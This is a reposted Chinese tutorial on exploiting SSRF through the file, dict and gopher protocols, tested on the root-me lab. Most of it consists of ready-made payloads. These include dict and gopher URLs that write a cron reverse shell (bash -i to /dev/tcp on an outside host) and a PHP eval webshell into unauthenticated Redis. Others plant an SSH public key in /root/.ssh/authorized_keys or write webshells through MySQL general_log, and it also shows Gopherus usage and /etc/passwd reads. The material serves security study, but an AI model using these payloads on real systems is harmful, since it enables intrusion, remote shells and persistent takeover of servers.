SSRF利用协议中的万金油——Gopher

这篇具有很好参考价值的文章主要介绍了SSRF利用协议中的万金油——Gopher。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

Gopher协议简介

SSRF攻击中常用协议

file协议

dict协议

gopher协议

Gopher攻击Redis

探测SSRF以及Redis服务

使用gopher协议写入定时任务

 使用gopher协议写入ssh公钥

Gopherus工具构造gopher协议数据流

Gopher攻击Mysql

Gopher攻击Fastcgi

参考链接



SSRF利用协议的有很多,但本文重点介绍Gopher协议带来的功能。

Gopher协议简介

附上官方介绍:

gopher支持发出GETPOST请求。可以先截获get请求包和post请求包,再构造成符合gopher协议的请求,gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)


SSRF攻击中常用协议

file协议

file协议主要用于读取服务器本地文件,访问本地的静态资源

file协议数据格式:

file://文件绝对路径名

例如:

file:///etc/passwd
file:///var/www/html/index.php
file:///usr/local/apache-tomcat/conf/server.xml

dict协议

dict协议一般常用来探测内网主机以及端口开放情况,既然能够探测端口,那么可以探测不同端口对应的服务的指纹信息。当然dict协议也可以用来执行一些服务的命令,如redis

  • 内网主机探测
  • 开放端口探测
  • 端口服务指纹探测
  • 执行命令

注意:dict执行命令多行操作的命令时,只能一次执行单行,需分多次执行。

dict协议数据格式:

ditc://ip:port

ditc://ip:port/命令

例如:

一、dict协议探测端口和服务指纹
dict://127.0.0.1:22
dict://172.22.10.10:3306
dict://127.0.0.1:6379/info


二、dict协议攻击redis,写入定时任务,进行反弹shell
centos系统定时任务的路径为:/var/spool/cron
debian系统定时任务的路径为:/var/spool/cron/crontabs

dict://127.0.0.1:6379/config:set:dbfilename:root
dict://127.0.0.1:6379/config:set:dir:/var/spool/cron
dict://127.0.0.1:6379/set:test:"\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.10.10.10/1234 0>&1\n\n"
dict://127.0.0.1:6379/save

注意:若payload存在被转义或过滤的情况,可利用16进制写入内容
dict://127.0.0.1:6379/set:test:"\n\n\x2a/1\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20/bin/bash\x20\x2di\x20\x3e\x26\x20/dev/tcp/10.10.10.10/1234\x200\x3e\x261\n\n"


三、dict协议攻击redis,写入webshell
dict://127.0.0.1:6379/config:set:dbfilename:test.php
dict://127.0.0.1:6379/config:set:dir:/var/www/html
dict://127.0.0.1:6379/set:test:"\n\n<?php @eval($_POST[x]);?>\n\n"
dict://127.0.0.1:6379/save

若存在过滤, 则利用16进制内容写入:
dict://127.0.0.1:6379/set:test:"\n\n\x3c\x3f\x70\x68\x70\x20\x40\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x78\x5d\x29\x3b\x3f\x3e\n\n"


四、dict协议攻击redis,写入ssh公钥
操作和写入定时任务相似

gopher协议

上面官方的说明了一下gopher协议介绍,具体如何在ssrf中使用呢?

gopher协议在ssrf的利用中一般用来攻击redis,mysql,fastcgi,smtp等服务。

gopher协议数据格式:

gopher://ip:port/_TCP/IP数据流

注意:

  • gopher协议数据流中,url编码使用%0d%0a替换字符串中的回车换行
  • 数据流末尾使用%0d%0a代表消息结束

Gopher攻击Redis

攻击redis之前先了解一下redis的协议数据流格式,方便后面对gopher协议中携带的数据流进行理解。

  • 数据流格式中CR LF表示的就是\r \n
*<参数数量> CR LF
$<参数 1 的字节数量> CR LF
<参数 1 的数据> CR LF
...
$<参数 N 的字节数量> CR LF
<参数 N 的数据> CR LF

简单示例:

  • *4:表示4个参数 config、set、dir、/var/www/html
  • $6:表示每个参数的字节长度 config长度为6
*4
$6
config
$3
set
$3
dir
$13
/var/www/html

Gopher攻击redis服务

 本次测试环境使用在线靶场:https://www.root-me.org/

探测SSRF以及Redis服务

SSRF利用协议中的万金油——Gopher

  • 使用file协议读取文件内容

SSRF利用协议中的万金油——Gopher

  • 使用dict协议探测开放的端口,可以看到开放了80,443,6379服务

SSRF利用协议中的万金油——Gopher

  • 判断redis服务有无身份验证,发现redis存在未授权访问

SSRF利用协议中的万金油——Gopher

使用gopher协议写入定时任务

redis未授权常规写入定时任务的操作

set ttt "\n\n\n*/1 * * * * bash -i >& /dev/tcp/xxx.xx.xxx.xx/1444 0>&1\n\n\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
quite

gopher协议数据流写入操作 :

gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$3%0d%0attt%0d%0a$69%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/xxx.xx.xxx.xx/1444 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a

 原始内容为:

*3
$3
set
$3
ttt
$69



*/1 * * * * bash -i >& /dev/tcp/xxx.xx.xxx.xx/1444 0>&1




*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
*1
$4
quit
  •  进行写入操作,发现没有写入成功。原因在于:curl_exec()造成的SSRF,gopher协议需要使用二次URLEncode;而file_get_contents()造成的SSRF,gopher协议就不用进行二次URLEncode;

SSRF利用协议中的万金油——Gopher

再一次进行url编码后进行发包,可以成功看到4个ok,说明四条语句均执行成功
SSRF利用协议中的万金油——Gopher

  •  等待1分钟,Vps成功接收到回连的shell

SSRF利用协议中的万金油——Gopher

  •  查看写入的key

SSRF利用协议中的万金油——Gopher

 可以看到确实成功写入到了redis中

SSRF利用协议中的万金油——Gopher

 使用gopher协议写入ssh公钥

常规redis未授权写入ssh公钥操作:

set 1 "\n\n\nid_rsa.pub\n\n\n\n"
config set dir /root/.ssh/
config set dbfilename authorized_keys
save
quite

gopher协议数据流写入操作 :

gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$576%0d%0a%0a%0a%0assh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHSdAmmBYRnUrfOOO0N0Y/fKCLHEqt8aoc3pQPfAKStDL12rlPlf0nmkzQmPcHoHBKW6AEqb2QXWiB2TQFJTBdMXThHdZe4RzN5pLPPlqUg6dZZQhIT0/La+POIyRRVRld+8vwDw1bNpWcnlNPxf77LS9yJxQZzub6o7OWL/w2xWLexSQAYUQ9mflz4qluV+/M4iVRuZ3FNzqDWgeIziDCUaJydBpO1cisMj9TWkXCmGaj5hl1WsrffaIjsdHO6wbrZIERGh/3HDpwXlsVXc2+m9Nyxalh4qeGFVG/Fso7APhVcAfhA3lkNOTwySk+sss6JE2ic3slvIO2zXj1wI/IHMPXNb2nhnVW+WRSDp9OAcDxdLTJK0k2pVlq2yi/dWUjrcZBP3LV9pnb5ASrKmhBzxkqSPnrBhyp55qawKW2rnCeHSg9gMt/OBlMKrGnroZj+w9scuie5OxDy/7Vvr7l8vq2IbzBoWEd5d4dxCDpmtXZS/yEnIo5Y9IIQJNuOvs= root@mk50%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$11%0d%0a/root/.ssh/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$15%0d%0aauthorized_keys%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a

  原始内容为:

gopher://127.0.0.1:6379/_*3
$3
set
$1
1
$576



ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHSdAmmBYRnUrfOOO0N0Y/fKCLHEqt8aoc3pQPfAKStDL12rlPlf0nmkzQmPcHoHBKW6AEqb2QXWiB2TQFJTBdMXThHdZe4RzN5pLPPlqUg6dZZQhIT0/La+POIyRRVRld+8vwDw1bNpWcnlNPxf77LS9yJxQZzub6o7OWL/w2xWLexSQAYUQ9mflz4qluV+/M4iVRuZ3FNzqDWgeIziDCUaJydBpO1cisMj9TWkXCmGaj5hl1WsrffaIjsdHO6wbrZIERGh/3HDpwXlsVXc2+m9Nyxalh4qeGFVG/Fso7APhVcAfhA3lkNOTwySk+sss6JE2ic3slvIO2zXj1wI/IHMPXNb2nhnVW+WRSDp9OAcDxdLTJK0k2pVlq2yi/dWUjrcZBP3LV9pnb5ASrKmhBzxkqSPnrBhyp55qawKW2rnCeHSg9gMt/OBlMKrGnroZj+w9scuie5OxDy/7Vvr7l8vq2IbzBoWEd5d4dxCDpmtXZS/yEnIo5Y9IIQJNuOvs= root@mk50




*4
$6
config
$3
set
$3
dir
$11
/root/.ssh/
*4
$6
config
$3
set
$10
dbfilename
$15
authorized_keys
*1
$4
save
*1
$4
quit
  •  进行写入操作,同样的需要将gopher后的数据流进行二次url编码方可成功

SSRF利用协议中的万金油——Gopher

  • 查看是否写入的成功 ,可以看到成功写入

SSRF利用协议中的万金油——Gopher

  •  随后就可以使用vps进行ssh登录到目标机器上
ssh -i /root/.ssh/id_rsa root@ip

Gopherus工具构造gopher协议数据流

使用手动构造比较麻烦,存在一定的失误率,使用gopherus这款工具进行自动化生成payload。该工具支持生成多种服务利用的payload,其中包括了redis、mysql、fastcgi等

  • 工具链接:
https://github.com/tarunkant/Gopherus
  •  攻击Redis利用

写入计划任务,反弹shell

python2 gopherus.py --exploit redis

SSRF利用协议中的万金油——Gopher

 将payload进行稍作修改,即可进行利用。

  • 二次url编码后发包,虽然没有响应包回显,但是通过dict协议进行查看,可以看到写入成功。

SSRF利用协议中的万金油——Gopher

SSRF利用协议中的万金油——Gopher

  • vps成功接收到了反弹回来的shell

SSRF利用协议中的万金油——Gopher


Gopher攻击Mysql

MySQL客户端连接并登录服务器时存在两种情况:需要密码认证以及无需密码认证。

  • 当需要密码认证时使用挑战应答模式,服务器先发送salt然后客户端使用salt加密密码然后验证
  • 当无需密码认证时直接发送TCP/IP数据包即可

在ssrf实际利用mysql服务过程中,一般是攻击无密码验证的mysql服务

gopher打mysql,就是利用gopher协议传shell到mysql中,使用gopher协议可以执行sql语句进而达到写马的操作

通过dict协议获取到mysql服务对应的端口,随后使用gopherus工具生成mysql的payload即可

 前提条件:

  • 知道网站路径
  • 当前用户对数据库具有执行权限

使用gopher协议执行mysql语句

python2 gopherus.py --exploit mysql

SSRF利用协议中的万金油——Gopher

ssrf利用gopher协议攻击时,是否需要二次url编码取决于是否由url_exec()造成的ssrf,所以二次编码因情况而定,此处就无需二次url编码。

SSRF利用协议中的万金油——Gopher

也可执行写入webshell的操作

SSRF利用协议中的万金油——Gopher

除此之外,若当前的数据库用户权限足够,还可以进行general_log日志写马

#数据库用户权限足够情况下,分别执行以下sql语句即可开启general_log日志写马条件。

#开启日志记录开关,默认是关闭状态
set global general_log='on';

#修改日志存储路径
set global general_log_file='D:\\phpStudy\\WWW\\log.php';

#随后就可以写入webshell了
select <?php @eval($_POST[8]);?>;

由于本地环境存在问题,就借用网上其他师傅的图用一用辣,见谅。

SSRF利用协议中的万金油——Gopher SSRF利用协议中的万金油——Gopher

成功以后即可使用webshell管理工具连接网站根目录下的log.php一句话木马了。


Gopher攻击Fastcgi

当端口9000(默认端口)暴露在外网时,我们可以伪造fastcgi与后端语言之间的协议报文来进行相关配置修改和一系列攻击。当未暴露在公网时,我们可以通过ssrf进行相同的操作。

SSRF利用协议中的万金油——Gopher

 同样的,gopher协议后的数据流是否需要二次url编码取决于是否由curl_exec()造成的ssrfSSRF利用协议中的万金油——Gopher


参考链接

https://cloud.tencent.com/developer/article/1587012

https://blog.csdn.net/weixin_50464560/article/details/118425121

https://blog.csdn.net/unexpectedthing/article/details/121667791#gopherFastCGI_99

https://github.com/firebroo/sec_tools/tree/master/redis-over-gopher文章来源地址https://www.toymoban.com/news/detail-425350.html


到了这里,关于SSRF利用协议中的万金油——Gopher的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 利用Linux目录结构特性引发的解析漏洞分析

    本文通过对Linux目录结构的特性和解析漏洞的分析,结合源码审计的过程,探讨了SESSION值的设置,正则表达式的匹配以及文件写入等技术,帮助读者深入理解此类漏洞的产生、原理和防范方法。

    2024年02月06日
    浏览(50)
  • Go&lua——github.com/yuin/gopher-lua

    这里比较下两个比较有名的go-lua包: github.com/Shopify/go-lua 和 github.com/yuin/gopher-lua 是两个Go语言库,允许Go程序与Lua脚本进行交互。 以下是这两个库之间的主要区别: Shopify/go-lua: Shopify/go-lua是一个用Go编写的Lua解释器。 它旨在提供一个轻量级、易于使用的Go和Lua之间的接口。

    2024年02月15日
    浏览(54)
  • 浅谈如何使用 github.com/yuin/gopher-lua

    最近熟悉 go 项目时,发现项目中有用到 github.com/yuin/gopher-lua 这个包,之前并没有接触过,特意去看了官方文档和找了些网上的资料,特此记录下。 本次介绍计划分为两篇文章,这一次主要介绍 github.com/yuin/gopher-lua 这个包的介绍以及基础使用,下一边将介绍 github.com/yuin/gop

    2024年02月04日
    浏览(33)
  • 大型语言模型比较: Gen2/Gen3模型(Bloom、 Gopher、 OPT 和 其它)

    大语言模型是产生文本的复杂的神经网络。自2018年成立以来,它们发生了戏剧性的进化,传递的信息可以与人类媲美。为了更好地理解这种演变,这个博客系列调查模型,以揭示它们如何前进。具体来说,从已发表的论文中对每个模型的见解进行了解释,并从基准比较中得出

    2024年02月22日
    浏览(50)
  • 6.3.6 利用Wireshark进行协议分析(六)----网页提取过程的协议分析

    6.3.6 利用Wireshark进行协议分析(六)----网页提取过程的协议分析 利用Wireshark捕获网页访问过程中产生的应用协议报文,还原Web服务中报文的交互过程,为了防止网页直接从本地缓存中获取,我们首先需要清空浏览器保存的历史记录或者数据,具体操作步骤如下 清空浏览器保

    2024年02月16日
    浏览(53)
  • 【网络协议分析】利用Wireshark分析IP分片

    一、实验目的 利用 Wireshark 软件抓包分析 IP 分片,了解IP分片的工作原理。 二、实验过程 1 、网络拓扑 设备 IP 地址 设备接口 MTU AR1 172.30.132.164 Ethernet 0/0/0 700 AR2 172.30.132.165 Ethernet 0/0/0 1200 2 、实验过程 (1)在eNSP中按网络拓扑搭建网络,并配置好IP地址、子网掩码等。 (2)

    2024年02月20日
    浏览(42)
  • 实验3 利用协议分析软件分析HTTP

    目录 一、实验目的 二、实验环境 三、 实验步骤 四、实验报告内容 一、实验目的 1.熟悉并掌握Ethereal(或WireShark)的基本操作,了解网络协议实体间的交互以及报文交换。 2.分析HTTP协议的报文格式中各字段语法语义和工作原理。 二、实验环境 联网计算机;主机操作系统为Wi

    2024年02月08日
    浏览(39)
  • 实验6-cp –r系统命令的实现--源路径(目录)中的所有文件和子目录,以及子目录中的所有内容,全部拷贝到目标路径(目录)中--操作系统实验

    掌握Linux目录操作方法,包括打开目录、关闭目录、读取目录文件 掌握Linux文件属性获取方法,包括三个获取Linux文件属性的函数、文件属性解析相关的宏 掌握POSIX与ANSI C文件I/O操作方法,包括打开文件、关闭文件、创建文件、读写文件、定位文件 利用POSIX API(文件操作也可

    2024年02月08日
    浏览(54)
  • 利用SMB协议实现局域网内设备文件的共享

    利用SMB协议实现局域网内iPad、iPhone、Windows文件快速传输 通过SMB协议可以实现主设备共享文件夹,及外部设备访问共享文件夹。 这里的主设备可以是windows系统,macOS系统。外部设备可以是windows系统,macOS系统,ipad,iphone等。 下面以windows为主设备,ipad为外部设备举例 方法一

    2024年02月10日
    浏览(56)
  • SSRF详解(包含多种SSRF攻击)

    简介 服务器端请求伪造(也称为 SSRF)是一种 Web 安全漏洞,允许攻击者诱导服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能会强制服务器连接到任意外部系统

    2023年04月25日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包